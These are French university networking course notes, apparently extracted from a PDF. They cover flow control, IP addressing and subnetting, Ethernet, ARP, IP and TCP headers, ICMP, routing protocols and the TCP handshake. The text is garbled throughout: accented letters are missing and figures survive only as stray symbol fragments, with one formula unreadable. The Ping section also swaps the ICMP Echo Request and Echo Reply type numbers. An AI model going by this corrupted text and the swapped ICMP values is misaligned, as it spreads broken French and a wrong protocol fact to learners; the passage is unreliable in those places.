Dans le cas X25, le contrle de flux fonctionne comme suit:

il est propag de proche en proche depuis le rcepteur vers l'


metteur, et tient
compte la fois des possibilits du rcepteur et du rseau,
il fonctionne par interdiction (paquets RNR) et autorisation (paquets RR avec
fentre fixe paramtrable au maximum 7, en numrotation modulo 8).

Le protocole IP, fonctionnant en mode datagramme, n'


assure pas de contrle de flux. Par
contre, le protocole TCP assure un contrle de flux fonctionnant comme suit:

le contrle de flux fonctionne de bout en bout, et ne tient compte que des


possibilits du destinataire et des caractristiques de transmission de bout en
bout sur le rseau,
il fonctionne par autorisation, avec une fentre d'
anticipation rglable par le
destinataire; la fentre d'
anticipation est au dpart de 1, augmente lors de la
communication quand le trafic passe bien, et diminue quand le trafic passe mal.

Adaptation de longueur de paquet

Les standards de taille de trames et paquets sont tous diffrents, ce qui rend ncessaire
une fonction d'
adaptation de longueur dans peu prs tous les protocoles. C'
est encore
plus vrai pour les messages et transactions de protocoles de niveau 7, qui ont des tailles
trs variables, sans rapport avec les protocoles et moyens de transmission. Les fonctions
de fragmentation - rassemblage et concatnation - d concatnation (ou groupage dgroupage) ont pour but de raliser les adaptations ncessaires.

19

CNAM Jean-Christophe GALLARD

Adressage, annuaire et routage


Adressage

L'
adressage est ncessaire quand plus de 2 machines communiquent travers un mme
mdia. Il permet une machine mettrice de dsigner la machine destinataire.
A la notion d'
adresse sont lis 3 concepts:

L'adressage consiste dfinir un plan cohrent d'


adresses pour un rseau.
L'aiguillage ou commutation consiste exploiter les tables dites de routage
pour orienter un paquet vers sa destination.
Le routage consiste tablir et tenir jour les tables de routage.

La fonction d'
aiguillage peut comprendre, selon les protocoles, plusieurs services
annexes:

l'unicast : transmission simple un seul abonn,


le multicast : diffusion un groupe d'
abonns dfini par une adresse (cas de IP
et Ethernet),
le broadcast : diffusion gnrale au sein d'
un rseau priv ou local (cas
d'
Ethernet),
la priorit de transmission (cas d'
IP et TokenRing).

Annuaires

Afin de dterminer avec prcision la localisation de son correspondant, la notion


dannuaire intervient tout naturellement. Au niveau rseau, les annuaires servent
principalement tablir un mcanisme de conversion entre les diffrents types
dadresses.
Contrairement aux adressages de niveau 2 4, destins des machines et des
protocoles, et cods en binaire, l'
adressage de niveau 7 est destin des individus
humains. C'
est un adressage fonctionnel, gnralement cod sous forme de texte, de
longueur variable, inexploitable directement par des machines assurant l'
aiguillage des
paquets. Une adresse de niveau 7 doit tre transforme en adresse de niveau 3 par un
service d'
annuaire adquat
Sur Internet, l'
URL (uniform ou universal resource location) est un adressage permettant
de dfinir de faon unique tout fichier accessible sur le rseau Internet (en protocole
HTTP ou FTP). L'
adresse E-Mail ou RFC 822 dsigne une personne accessible par EMail sur Internet.

Routage

La fonction de routage a pour but l'


tablissement et la tenue jour des tables de routage
au sein des machines de rseau charges d'
assurer l'
aiguillage des paquets dans des
rseaux maills.
20

CNAM Jean-Christophe GALLARD

Dans des petits rseaux, notamment les rseaux locaux privs, les tables de routage
peuvent tre construites la main par l'
administrateur rseau. Dans les grands rseaux
publics ou internationaux, c'
est impossible du fait du nombre d'
abonns et de la frquence
quotidienne des changements.
Les protocoles de routages permettent aux noeuds de rseau de dialoguer entre eux pour
changer des informations sur la liste des rseaux et abonns accessibles, avec les
distances pour atteindre ces rseaux et abonns.
Chaque machine tablit et tient jour ses tables de routage en fonction des informations
reues par les diffrentes liaisons qu'
elle gre, puis diffuse ses propres informations vers
les machines voisines. Les tables de routage se construisent ainsi par propagation, en
intelligence rpartie.
La stabilisation (ou convergence) des tables ne se fait qu'
au bout d'
un certain temps,
compte tenu de la vitesse de propagation des informations, des bouclages possibles, et
des modifications pouvant survenir tout moment. Dans un rseau priv d'
envergure
nationale, elle peut demander plusieurs heures, voire plusieurs jours. Dans un rseau
comme Internet, elle ne survient jamais, et les tables de routage sont en modification
permanente, ce qui fait que les chemins pour atteindre un abonn sont constamment
diffrents.
Chaque machine calcule ses tables de routage selon un certain nombre de critres
destins trouver le chemin le plus court, le moins cher et le moins satur. Exemples de
critres:

nombre de liaisons et de noeuds traverss en srie (critre minimal, cas du


protocole RIP),
dlai de transmission cumul sur les liaisons et noeuds traverss,
cot cumul des liaisons (liaisons commutes ou publiques / permanentes ou
prives),
dbit maximal disponible sur les liaisons et noeuds traverss.

Plus prcisment, les critres de routage peuvent prendre en compte 3 types


d'
informations :

informations lies la topologie du rseau, lentement variables,


informations lies aux dbuts et fin de panne des liaisons et noeuds,
moyennement variables,
informations lies l'
occupation des ressources et la saturation, rapidement
variables.

Dans le dernier cas, il existe une boucle de retour entre l'


tat du trafic et le routage, ce
dernier pouvant aggraver la saturation en la propageant.

21

/
0 + ! 12 3

Prambule
Bien quissues de technologies relativement anciennes (le concept de lInternet a dj
plus de trente ans), les suites protocolaires bases sur IP se sont imposes comme des
standards de fait concernant les communications entre les rseaux.
Les technologies IP sont ainsi devenues le support naturel de la grande majorit des
applications client / serveur.
Les consquences dune telle volution de linformatique distribue sont multiples, on
pourra cependant retenir les points suivants :
Le modle client / serveur reposant sur des standards ouverts est plus
expos aux attaques que les solutions propritaires non matrises par les
agresseurs.
Ceci nimplique pas que les protocoles TCP / IP sont plus vulnrables que dautres.
Simplement, des outils plus largement diffuss et utiliss rvlent plus de vulnrabilits de
conceptions et dimplmentation que dautres produits diffusion plus confidentielle, et ce
en raison mme du caractre public de ces outils de communication. En un sens, ces
solutions normalises progressent plus vite en terme de scurit puisque lensemble de la
communaut des utilisateurs participe leur amlioration.
Pour conclure sur ce point, un systme peu connu nest pas ncessairement plus
scuris quun autre plus connu, il savre seulement moins expos des attaques. Ainsi,
en matire de cryptographie, la scurit dun algorithme ne repose pas sur le fait quil ne
soit pas publi, mais sur la qualit du chiffre gnr et sur la longueur des clefs utilises.
En effet, dans un tel cas de figure (scurit du chiffre bas sur la confidentialit de
lalgorithme), il suffirait que lalgorithme devienne public pour quil soit rendu inutilisable,
ce qui ne constitue pas une solution de scurit acceptable, dautant plus que certaines
mthodes de rtro-conception peuvent toujours tre employes pour retrouver les
algorithmes employs.
Les protocoles TCP/IP possdent des vulnrabilits intrinsques de
conception,
auxquelles
il
convient
dajouter
des
vulnrabilits
dimplmentation.
Les technologies TCP/IP ont t conues dans le but de simplifier et de normaliser les
changes entre machines au travers dun rseau. De fait, la conception mme de cette
suite protocolaire souffre de dfauts conceptuels en termes de scurit. Le fait que ce
sont les quipements terminaux qui positionnent eux-mmes certains champs
protocolaires demeure un exemple typique de ces dfauts conceptuels. En outre,

23

CNAM Jean-Christophe GALLARD

certaines options protocolaires (notion de paquet urgent,


fragmentation) peuvent constituer des failles de scurit.

source

routing ,

Avec ces problmes de conception des protocoles, il faut galement compter avec les
dfauts dimplmentation que chaque dveloppeur ajoute, volontairement ou non : effets
de bords aux limites, interprtation de certaines options (les standards TCP/IP sont
parfois flous sur certains aspects), non-vrification de paramtres trop longs ou
incohrents (soit par ignorance du fonctionnement protocolaire, soit par une trop grande
confiance accorde aux quipements rseaux)

Architecture des protocoles TCP / IP


La pile protocolaire TCP / IP sappuie principalement sur quatre couches de protocoles,
sappuyant sur une couche matrielle (gnralement Ethernet) :

La couche Liaison de donnes constitue linterface avec le matriel,


La couche Rseau gre la circulation des paquets au travers,
La couche Transport assure les communications de bout en bout en faisant
abstraction des nuds intermdiaires entre les deux entits communicantes,
La couche Application est celle des programmes utilisateurs.

Le protocole Ethernet
Le protocole Ethernet demeure le principal support des communications TCP/IP. Cest un
protocole de niveau bas, en ce sens quil ne couvre que les couches 1 et 2 du modle
OSI de lISO.
Le principe de base du protocole Ethernet est celui de la diffusion ; une trame mise
sur un segment physique est retransmise tous les quipements prsents sur ce mme
segment, la responsabilit de traitement de la trame revenant lquipement destinataire,
les autres machines devant ignorer une trame ne leur tant pas destine.
Le principal problme du protocole Ethernet demeure alors la gestion des problmes de
collisions : que se passe t-il si deux quipements mettent une trame en mme temps sur
le mme segment rseau ?

24

CNAM Jean-Christophe GALLARD

Cest le protocole 802.3 normalis par lIEEE, galement connu sous lacronyme CSMACD (Carrier Sense Multiple Access Collision Detection), qui rsout le problme par une
4
mthode non dterministe daccs au mdia :

Les stations qui mettent scoutent durant la phase de transmission, sarrtant


aprs un temps fixe aprs avoir dtect une collision (caractrise par le fait que
lmetteur saperoit que ce quil reoit est diffrent de ce quil a mis).
Lmetteur ne sarrte pas tout de suite, afin dtre certain que toutes les stations
mettant saperoivent de la collision.
Dans ce cas, elles vont ritrer leur tentative, au terme dun dlai de brouillage
variable.

Le temps durant lequel deux stations peuvent entrer en collision sans sen apercevoir
correspond au dlai de propagation entre les deux stations, il est donc intimement li la
longueur physique du segment Ethernet, ce qui explique en partie les limitations
concernant la longueur maximale dun segment.
De fait, le temps de rsolution dun conflit est fonction de la charge du rseau : cette
technique donne de trs bons rsultats faible et moyenne charge, puis seffondre trs
rapidement.

Les protocoles ARP / RARP


Au sein d'
un rseau local, lorsqu'
une trame Ethernet est envoye d'
une machine une
autre, c'
est l'
adresse Ethernet sur 48 bits (galement appele adresse MAC) qui
dtermine quelle interface la trame est destine. La rsolution d'
adresse procure une
table de correspondance entre l'
adresse MAC et l'
adresse IP d'
une machine.
Cette rsolution d'
adresse est ralise, sur les rseaux de type Internet, par les
protocoles ARP (Adress Resolution Protocol) et RARP (Reverse Adress Resolution
Protocol).

!
&

&

"#

'

'

$%

&

&

Format dune requte ARP


Lorsqu'
on souhaite obtenir une correspondance entre une adresse IP et une adresse
MAC, la couche ARP met une trame Ethernet appele requte ARP chaque
machine du rseau (requte mise en broadcast Ethernet) et qui contient l'
adresse IP de
la machine de destination. La couche ARP de la machine de destination reoit la requte
ARP, vrifie que l'
appelant lui demande son adresse IP et rpond par une rponse ARP
qui contient l'
adresse IP et l'
adresse MAC correspondante. Ces correspondances sont
alors stockes dans un cache sur chaque machine avant d'
tre dtruites ou rgnres
au bout d'
une vingtaine de minutes.
Dans ce protocole, on remarque que lon fait une confiance aveugle dans linterface qui
rpond :

La mthode est dite non dterministe , car on ne peut pas garantir un temps maximal de
rsolution de conflit, et il nexiste pas dassurance quune machine puisse mettre (problme
classique de famine ).
25

CNAM Jean-Christophe GALLARD

on considre que les stations non concernes par la requte ARP se taisent,
la rponse ARP reue nest ni signe (intgrit ?), ni authentifie (validit ?).

Le protocole IP
Le modle OSI de lISO, dfinit 7 couches logiques pour dcrire le fonctionnement des
communications au travers dun rseau.
Le principe de base du passage dune couche rseau une autre consiste mettre en
uvre un mcanisme dencapsulation des donnes.
Un paquet IP se constitue ainsi dun en-tte et dun champ de donnes dans lequel on
introduit un segment TCP ou UDP. Ce segment est galement constitu dun en-tte et
dun champ de donnes qui contiendra les protocoles de niveau suprieur et ainsi de
suite.

Chaque protocole rseau est donc compos de champs, dont le contenu et la taille (et,
par extension, sa complexit) dpendent du protocole. Dans la plupart des cas, ces
champs sont remplis automatiquement par le systme.

Adressage IP

L'
adressage IP est de longueur fixe gale 4 octets (nots sous forme de 4 nombres
dcimaux spars par des points). Cette longueur s'
avre dramatiquement trop faible face
l'
expansion d'
Internet, mais le problme sera rsolu avec IPv6 qui propose un champ
d'
adressage de 16 octets.
L'
adressage IP est structur en 2 parties: numro de rseau, numro d'
abonn dans le
rseau. Ceci tient au fait que IP, ds le dpart, a servi interconnecter des rseaux
locaux, plutt que des machines comme dans le cas de X25.
Il existe principalement 5 classes d'
adresses (de A E), correspondant des rseaux
plus ou moins grands. Plus le rseau est grand, plus la partie numro d'
abonn est
grande, et plus la partie numro de rseau est petite. Le codage de la classe est ralis
dans les premiers bits d'
adresse.

26

CNAM Jean-Christophe GALLARD

Adresses IP spciales

numro d'
abonn la valeur 0x00: dsigne le rseau lui mme,
numro d'
abonn avec octet 0xFF (soit 255 en dcimal): signifie une diffusion
toutes les machines du rseau,
d'
une manire gnrale: 0x00 = soi mme, 0xFF = tout le monde (valeurs
hexadcimales).

Sous adressage IP

Il est possible de dfinir un sous rseau d'


un rseau donn, par le biais d'
un masque de
sous rseau. Cette possibilit quivaut dfinir une structure plus fine du champ
numro d'
abonn dans le rseau . En effet, le principe de ladressage IP consiste
considrer quun abonn situ dans un rseau nest spar de ses homologues situs
dans le mme rseau par aucun quipement actif.
Si lon conservait le plan dadressage dcrit plus haut, cela signifierait donc quune
entreprise disposant dun rseau de classe A devrait mettre toutes ses machines sur un
seul et mme segment physique
Le principe du sous adressage consiste fournir, en plus dune adresse IP complte, un
masque de la taille dune adresse IP et compos dun champ de bits. Les bits 1 dans ce
champ indiquent que, pour le sous rseau considr, les bits dadresses dans ce sous
rseaux seront toujours fixes. A linverse, les bits 0 indiquent une variabilit de ces
derniers dans ladresse IP.
Exemple 1 :
soit une adresse IP de valeur 123.10.10.1 laquelle on associe un masque
255.255.255.0 indique que cette machine se situe dans un sous rseau constitu des
adresses 123.10.10.0 123.10.10.255 (puisque seul le dernier octet est variable).
Exemple 2 :
Soit une adresse IP en 192.10.10.1 avec un masque de sous rseau en
255.255.255.248.
Ici, il est plus simple de travailler en binaire pour mieux comprendre ce qui se passe :

27

CNAM Jean-Christophe GALLARD

Dans cet exemple, ladresse IP, associe son masque, dfinit donc un espace
dadressage contigu sur les adresses 192.10.10.0 192.10.10.7.
De la mme manire, avec une adresse 192.10.10.8 et le mme masque, on aurait
dfinit la plage 192.10.10.8 192.10.10.15.
Classiquement, on a tendance utiliser des bits 1 dans la partie gauche du masque et
des bits 0 dans sa partie droite. Cette manire de faire permet de construire un
adressage sous forme dun arbre de sous-rseaux, ce qui simplifie considrablement le
travail de routage.
On trouve alors une notation alternative, raccourcie, indiquant uniquement le nombre de
bits 1 dans le masque, la suite de ladresse IP. Ainsi, la notation 192.10.10.1/24
quivaut une adresse en 192.10.10.1 avec un masque 255.255.255.0 (les 24 bits de
poids fort sont 1).
Cependant, il reste possible de dfinir des masques autorisant des plages dadresses non
contigus, mme si ce type de masque est exceptionnellement rencontr en raison de sa
complexit de gestion au jour le jour et de la non optimisation quelle gnre sur les tables
de routage. Par exemple, ladresse 192.10.10.2 associe au masque 255.255.255.1
dfinit toutes les adresses paires de 192.10.10.0 192.10.10.254

Contenu dun paquet IP

Len-tte IP a une longueur minimale de 20 octets. Si des options IP sont spcifies dans
le paquet, cette longueur peut tre plus grande.

Champ

Contenu

Version

Ce champ dfinit la version du protocole IP utilise pour le paquet.


Les valeurs 0 et 15 sont rserves, les valeurs 1 3 et 10 et 14 ne
28

CNAM Jean-Christophe GALLARD

Champ

Contenu
sont pas affectes.
Typiquement, ce champ vaut 4 (IPV4), mais peut galement valoir 6
(IPV6)

IHL

Internet Header Length, ou longueur den-tte Internet. Contient la


taille de len-tte.

Type of Service Ce champ informe les rseaux de la qualit de service dsire,


spcifiant ainsi la prsance, les dlais, le dbit et la fiabilit. Par
dfaut la valeur du TOS est 0 (Note : MBZ signifie Must Be Zero !).

Total Length

Contient la taille totale du paquet (en-tte + donnes)

Identification

Ou IPID. Contient un identificateur unique du paquet. Il sert


essentiellement identifier les fragments de paquets IP afin de les
relier un paquet IP originel donn. On lutilise conjointement avec les
flags DF, MF et le champ Fragment Offset .

DF

Flag Dont Fragment. Si ce flag est 1, le paquet ne doit pas tre


fragment

MF

Si le flag MF (More Fragments) est 1, le destinataire est inform que


dautres fragments vont arriver. Un MF 0 indique quil sagit du
dernier fragment. Pour un paquet IP complet, le MF est toujours 0.

Fragment
Offset

Ce champ indique la position des donnes du fragment par rapport au


dbut du datagramme originel

TTL

Time To Live. Cette valeur est dcrment chaque traverse dun


5
quipement actif (routeur). Lorsque le TTL arrive 0, le paquet est
dtruit par le routeur qui renvoie alors gnralement un message
ICMP la source pour lui indiquer cette destruction.

Protocol

Ce champ indique le type de protocole utilis dans le champ de DATA


du paquet IP (6 pour TCP, 17 pour UDP, 1 pour ICMP)

Header
Checksum

Somme de contrle de len-tte IP.

Source
Address

Contient ladresse IP de lmetteur

Destination

Contient ladresse IP du destinataire

La RFC prcise en fait que ce TTL contient la dure de vie maximale en secondes du paquet. En
thorie, ce TTL devrait donc tre dcrment pour chaque seconde passe dans le rseau. En
pratique, on a tendance dcrmenter cette valeur chaque traverse dun quipement actif.
29

CNAM Jean-Christophe GALLARD

Champ

Contenu

Address
Options IP

Ces champs, facultatifs et de taille variable, servent indiquer les


diffrentes options du protocole IP : Scurit, Record Route, Strict
source routing, loose source routing ou Internet Timestamp.

Padding

Bourrage

DATA

Segment de donnes du paquet IP.

Le protocole ICMP
Description

En tant que tel, le protocole IP seul ne peut suffire assurer le fonctionnement nominal
dun rseau puisquil noffre quun service de transport de donnes en mode non
connect. Cest pourquoi il existe des protocoles additionnels, permettant de rsoudre des
problmes ponctuels.
ICMP (Internet Control Message Protocol) est un protocole rseau particulier dans
TCP/IP. Il communique les messages d'
erreur et les autres circonstances qui rclament
attention. Les messages ICMP se conforment gnralement, soit la couche IP, soit la
couche suprieure du protocole (TCP ou UDP). Les messages ICMP sont transmis
l'
intrieur de datagrammes IP ; ils comportent donc un en-tte IP, le contenu du
datagramme IP tant compos du corps du message ICMP.

"#

$,
+

Un message ICMP contient toujours une copie de l'


en-tte IP et des 8 premiers octets du
datagramme IP qui ont provoqu l'
erreur. Ceci permet au module ICMP d'
associer le
message qu'
il reoit un protocole particulier (TCP ou UDP en fonction du champ
protocole de l'
en-tte IP) et un processus particulier ( partir des numros de ports TCP
ou UDP qui figurent dans l'
en-tte TCP ou UDP, contenus dans les 8 premiers octets du
datagramme IP).
%

'&

Format gnral du message ICMP

Quelques exemples dutilisation du protocole ICMP


Ping
Le programme Ping permet de vrifier si une autre machine est accessible. Le
programme Ping envoie une requte ICMP de type 0 (Echo Request) contenant un
30

CNAM Jean-Christophe GALLARD

numro de squence une machine cible, qui met en rponse une rponse ICMP
de type 8 (Echo Reply) contenant le numro de squence prcis.
,

1 %
.,

%/

'2 '&

3'

.,/

'&
%

Format du message ICMP pour la requte et la rponse Echo


Ping est capable d'
afficher le temps ncessaire la rponse par comparaison entre
l'
heure d'
mission du paquet ICMP et l'
heure de rception. Cette fonctionnalit peut
indiquer l'
loignement relatif d'
une machine.
Erreurs ICMP port non accessibles
Dans TCP, un segment reu sur un port ferm se traduit par lmission dun segment
contenant le flag RST, mettant fin la session. Pour le protocole UDP, ce mcanisme
ne peut tre utilis puisquil sagit dun protocole sans connexion.
En principe, UDP rpond alors avec un message ICMP indiquant un port inaccessible
(message ICMP de type 3 - code 3) s'
il reoit un datagramme UDP et que le port de
destination ne correspond pas un port utilis par un processus.
Notons qu'
il existe 16 messages de type entit inaccessible diffrents dont les
codes sont numrots de 0 15.
,

1 %
.3/

'2 '&
.,"'2/

3'
-

'&
%

"#

.
*

# ,/

/5

%
! *

Message ICMP "inaccessible"

Les protocoles de routage


Types de remise

Le routage est lune des fonctionnalits principales du protocole IP, il consiste choisir la
manire la plus appropri de transmettre un paquet son destinataire final, au travers
dun rseau compos de nuds.
On distingue deux types de transmission de paquets : la remise directe, intervenant
entre deux stations situes sur un mme segment de rseau, et la remise indirecte, mise
en uvre dans tous les autres cas.
Sur un rseau Ethernet, la remise directe consiste encapsuler le paquet IP dans une
trame Ethernet dont ladresse de destination a pralablement t rsolue grce au
protocole ARP. De mme, la remise indirecte va consister transmettre le paquet vers un
quipement intermdiaire appel routeur, et qui aura la charge de transfrer le paquet
son destinataire doit directement, soit indirectement.
De faon gnrale, le choix du type de remise (directe ou indirecte) est pris en consultant
son adresse IP et le masque de sous rseau associ. Si deux stations se trouvent sur le
mme sous rseau, on choisit le mode de remise directe.
31

CNAM Jean-Christophe GALLARD

Au cas o il serait ncessaire de procder une remise indirecte, le choix du routeur vers
lequel acheminer le paquet seffectue en consultant une table de routage, qui contient
nominalement - tous les lments ncessaires cette prise de dcision.

Notion de table de routage

Lessentiel dune table de routage IP est constitue de quadruplets (destination,


passerelle, masque, interface) o :

Destination est ladresse IP dune machine ou dun rseau de destination,


Passerelle est ladresse IP du prochain routeur vers lequel envoyer le paquet pour
atteindre cette destination,
Masque est le masque associ ce rseau de destination,
Interface dsigne linterface physique par laquelle le paquet doit tre expdie.

Une table de routage peut galement contenir une route par dfaut, qui prcise quel
routeur il faut envoyer un paquet pour lequel il nexiste pas de route dans la table.

Algorithmes de routage

Afin deffectuer le meilleur routage possible, plusieurs solutions existent.


Le routage centralis
A partir dinformations recueillies auprs des diffrents nuds, un calculateur centralis
va indiquer le meilleur chemin un instant donn. Cette mthode, simple mais trs
efficace, ncessite de trs nombreux messages, encombrant le rseau. Le nud de
routage est alors trs vulnrable.
Cette mthode est utilise notamment par les rseaux X25.
Le routage dcentralis
A partir dinformations locales (internes, telles les quantits dinformations passant sur
chaque ligne, ou encore ces mmes informations recueillies auprs des nuds voisins),
le routeur va dterminer de lui-mme la meilleure route, et ce en utilisant trois mthodes
principales :
Routage Statique
Par un algorithme nutilisant que des donnes locales, on cherche orienter un
message entrant. Par exemple, en inondant toutes les voies de sorties du nud, en
choisissant alatoirement une sortie ou en se basant sur une table de routage
pralablement renseigne par un administrateur.
Routage Dynamique
On cherche se dbarrasser des paquets entrants au plus vite (gnralement par la
voie ayant le moins de trafic), selon un algorithme de type la patate chaude par
exemple. Ce mcanisme tait utilis par le rseau DecNet, avec comme critres le
nombre de sauts ncessaires pour atteindre un destinataire, pondr par le cot
du saut, inversement proportionnel la bande passante.
Routage Adaptatif
Par lchange de tables de routage partielles pondres, de proche en proche entre
les nuds, et par dtermination des nuds les moins chargs ou des chemins les
plus rapides ou les plus courts, on achemine les paquets vers leurs destinataires.
Lors dun changement de topologie du rseau (lien cass , routeur en panne,
nouveau nud), les tables de routage locales sont alors modifies, par un
mcanisme dinondation et de proche en proche. Ce mcanisme pose le problme du
32

CNAM Jean-Christophe GALLARD

temps de convergence, dlai au bout duquel une modification du routage est


rpercute sur lensemble des nuds.
Ce mcanisme est celui classiquement utilis par les rseaux IP (Internet).

Protocoles existant

Les protocoles de routage permettent aux routeurs d'


tablir leurs tables de routage, par
dialogue mutuel et intelligence rpartie. Il existe plusieurs protocoles de routage dans la
famille IP, correspondant des usages particuliers ou des niveaux technologiques
diffrents.

RIP
EGP
IGP
BGP
GGP
IS-IS
IGRP
OSPF

(Routing Information Protocol) le plus ancien et le plus simple,


(Exterior Gateway Protocol),
(Interior Gateway Protocol),
(Border Gateway Protocol),
(Gateway to Gateway Protocol),
protocole normalis ISO,
(Internet Gateway Routing Protocol) dfini par Cisco,
(Open Shortest Path First) le plus rcent et volu.

RIP est le protocole le plus simple et le plus ancien. Ses caractristiques sont:

chaque liaison compte pour 1 point (1 saut), quelle que soit sa capacit,
les diffusions d'
informations de routage se font toutes les 30 secondes,
les tables vieillissent en 3 minutes,
le nombre maximal de sauts grs est de 16 (donc totalement inadquat pour les
grands rseaux).

OSPF est le plus rcent et le plus volu. Ses caractristiques sont:

prise en compte de tous les critres de poids dcrits plus haut,


concept de routage de machine machine, de rseau rseau,
possibilit de prendre en compte une base de donnes topologique.

Le protocole TCP
Caractristiques du protocole

Le protocole TCP fournit un service de transport de flux doctets orient connexion et


fiable. Les donnes transmises dans TCP sont encapsules dans des paquets IP en y
fixant la valeur de protocole 6.
Les termes orient connexion signifient que les deux extrmits doivent tablir une
connexion avant tout change de donnes. Les ordinateurs vrifient ainsi que la
communication est autorise, que le service est bien disponible et que les deux machines
sont prtes communiquer. Une fois que ces changes sont raliss, les applications
sont alors informes quune communication est tablie et quelles peuvent alors
commencer mettre. La communication TCP est ainsi en mode Point Point, bidirectionnelle simultane (full-duplex), et compose de deux flux doctets indpendants et
de sens contraire.
La fiabilit de TCP consiste remettre des segments sans perte ni duplication, alors
mme que le protocole repose sur IP qui nest pas un protocole fiable. Cette fiabilit
repose sur lutilisation du principe gnral de laccus de rception (ACK). Chaque
segment est mis avec un numro de squence qui va servir de rfrence pour lenvoi de
laccus de rception ; de cette manire, lmetteur sait si le segment correspondant est
bien arriv son destinataire.
33

CNAM Jean-Christophe GALLARD

A chaque mission dun segment, lmetteur arme une temporisation qui sert de dlai
dattente pour la rception de lacquittement ; lorsque la temporisation expire sans quil ait
reu dacquittement, lmetteur considre que le segment est perdu et il le rmet.
Le format gnral dun segment TCP est reproduit dans le tableau ci-dessous.

Champ

Contenu

Source Port

Port TCP source

Destination Port

Port TCP de destination

Sequence Number Identificateur unique du segment TCP


Acknowledgment
Number

Contient le numro de squence du prochain octet auquel sattend


le rcepteur (Note : un mme acquittement peut servir acquitter
plusieurs segments de messages TCP). Ainsi, si lon souhaite
acquitter un segment TCP dont le SN vaut 100 et la taille des
donnes vaut 100, le AN renvoy sera 100+100=200

Data Offset

Ce champ indique le nombre de mots de 32 bits qui se trouvent


dans len-tte TCP. Cette information est ncessaire parce que le
champ Options a une longueur variable.

Reserved

Inutilis

URG, ACK, PSH, Flags indiquant le(s) type(s) de segment :


RST, SYN, FIN
URG : lactivation de ce flag indique lenvoi des donnes hors
bande sans attendre que le rcepteur ait trait les octets dj
envoys dans le flux. Ce flag est gnralement utilis pour
permettre un paquet de passer devant la file dattente lorsquun
message est important pour le rcepteur
ACK : indique que le champ Acknowledgment Number est valide.
PSH : indique que le rcepteur doit remettre immdiatement les
donnes au processus de couche suprieure (sans les buffriser

34

CNAM Jean-Christophe GALLARD

Champ

Contenu
par exemple)
RST : indique la rinitialisation du circuit virtuel pour cause derreur
irrcuprable (port ferm par exemple). A la rception dun
message RST, le rcepteur doit immdiatement fermer la
connexion
SYN : indique louverture dune connexion
FIN : indique la fermeture dune connexion

Window

Ce champ implmente un contrle de flux : une fentre spcifie le


nombre doctets que le rcepteur est en mesure daccepter

Checksum

Somme de contrle de len-tte TCP

Urgent Position

Si le flag URG est activ, ce champ est considr comme valide et


doit alors contenir un pointeur vers le dernier octet des donnes
urgentes.

Options

Ce champ occupe un nombre de bits multiples de 8, il prcise des


options ventuelles dans le segment TCP. Dans les faits, ce
champ ne peut contenir que 3 options :
End-of-Options : marqueur de fin des options
No-operation : sert uniquement aligner le commencement de
loption suivante
MSS : taille maximale de segment (loption MSS est ngocie
ltablissement de la connexion)

Padding

Bourrage

DATA

Contient les donnes pour le protocole de niveau suprieur

Contrle de flux

Afin dviter de devoir mettre un segment dacquittement pour chaque segment reu,
TCP autorise un mcanisme danticipation permettant dmettre plusieurs segments sans
attendre dacquittement du rcepteur. Le mcanisme invoqu est celui de la fentre
glissante TCP et exploite le champ Window du protocole TCP.
Lors de la phase initiale dtablissement de session, le rcepteur indique lmetteur,
dans le champ TCP Window, quelle est sa taille de fentre TCP maximale. Ce champ
dfinit une fourchette de squence doctets nayant pas besoin daccuss de rception, et
celle-ci se dplace au fur et mesure que les accuss de rception sont reus.

35

CNAM Jean-Christophe GALLARD

Le rcepteur ignorera toute donne mise hors fentre mme si la communication


TCP peut sembler valide.
En outre, la taille de cette fentre impose par le rcepteur peut voluer dans le temps.
En effet, si le mcanisme de fentre TCP ne pose aucun problme particulier sur un
rseau local, lutilisation dun WAN change la donne : la taille de fentre accept par le
rcepteur nest sans doute pas adapt aux capacits de traitement du rseau entre les
deux stations.
Le mcanisme du slow start TCP superpose la fentre dmission une autre fentre
dite de congestion (congestion window, ou cwnd), initialise 1 lors de
ltablissement de la session. A chaque acquittement reu, la fentre de congestion est
double. Lmetteur peut mettre jusqu concurrence de lune de ces deux fentres.
Lorsquune erreur est rencontre sur la ligne, la fentre de congestion est alors ramene
sa valeur initiale de 1 et le cycle recommence.
A ce slow start sajoute un autre algorithme de contrle de flux, appel Evitement
de congestion (congestion avoidance), et qui intervient ds que la fentre de
congestion atteint la moiti de la valeur de la fentre dmission.
A ce stade, la fentre de congestion est incrmente par le carr de la taille des
segments, divis par la taille de la fentre de congestion ( 5

4, $ =

ce chaque fois quun acquittement est reu.

$
4

), et

Etablissement dune session TCP


Un client souhaitant communiquer avec un service sur une machine distante choisit un
port source suprieur 1024 afin que le service destination puisse lui rpondre.
Une communication est ainsi caractrise par:

Une adresse source


Une adresse destination
Un port source
Un port destination
Un protocole (TCP : mode connect, UDP : mode non connect pas de garantie
dacheminement)

Pour une communication TCP, le protocole prvoit un tablissement de la session en trois


passes (Three way handshake) comme dcrit ci dessous :
Le client A cre un segment TCP destination du serveur B et contenant les champs
suivants :
Adresse Source
Adresse Destination
Port Source
Port Destination
Sequence Number
Flags TCP
Ack Number

A
B
P1
P2
S1
SYN
0

Le serveur B rpond alors au client A en mettant un segment constitu ainsi


Adresse Source
Adresse Destination

B
A
36

CNAM Jean-Christophe GALLARD

Port Source
Port Destination
Sequence Number
Flags TCP
Ack Number

P2
P1
S2
SYN, ACK
S1+n (acquittement de la trame
prcdente)

Le client A met alors un segment TCP dacquittement :


Adresse Source
Adresse Destination
Port Source
Port Destination
Sequence Number
Flags TCP
Ack Number

A
B
P1
P2
S3
ACK
S2+n (acquittement de la trame
prcdente)

La communication peut alors se poursuivre normalement jusqu son expiration

La terminaison dune session TCP peut se drouler selon deux procdures distinctes,
selon quil sagit dune fin de session normale ou anormale.

En cas de terminaison normale dune session TCP, nimporte laquelle des deux
extrmits a la possibilit de mettre un terme la session en mettant un
segment contenant le flag FIN. Ds cet instant, lmetteur du FIN se met dans
une position dans laquelle il avertit son homologue quil nmettra plus de
donnes, mais il peut toujours en recevoir (la session TCP demeure donc semiferme). Lquipement qui a reu le segment FIN doit acquitter ce segment, mais
peut continuer mettre des donnes. Il devra, pour fermer compltement la
session, mettre son tour un segment FIN. Lacquittement de ce dernier
segment mettra un terme dfinitif la session, chaque extrmit.
On peut donc considrer la fermeture normale dune session TCP comme un
Three way goodbye :

37

CNAM Jean-Christophe GALLARD

Dans le cas o une erreur intervient dans le flux TCP (dsynchronisation des
quipements, tentative de connexion sur un port ferm, rception dun
acquittement hors fentre), lmission dun segment contenant le flag RST peut
provoquer une terminaison unilatrale de la session TCP.

Le protocole UDP
